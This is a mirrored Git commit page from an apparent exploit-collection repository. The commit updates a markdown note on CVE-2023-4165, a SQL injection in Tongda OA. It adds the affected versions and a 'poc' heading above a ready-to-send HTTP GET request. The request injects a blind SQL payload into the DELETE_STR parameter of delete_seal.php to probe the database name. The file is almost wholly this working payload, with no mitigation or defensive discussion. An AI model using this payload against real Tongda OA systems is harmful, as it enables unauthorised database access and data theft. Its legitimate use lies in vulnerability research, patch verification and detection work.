mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-23 02:35:35 +08:00
Update 通达OA sql注入漏洞 CVE-2023-4165.md
This commit is contained in:
@@ -1,4 +1,10 @@
|
|||||||
## 通达OA sql注入漏洞 CVE-2023-4165
|
## 通达OA sql注入漏洞 CVE-2023-4165
|
||||||
|
|
||||||
|
## 影响版本
|
||||||
|
```
|
||||||
|
通达OA ≤ v11.10,v2017
|
||||||
|
```
|
||||||
|
## poc
|
||||||
```
|
```
|
||||||
GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
|
GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
|
||||||
Host: 127.0.0.1:8080
|
Host: 127.0.0.1:8080
|
||||||
|
|||||||
Reference in New Issue
Block a user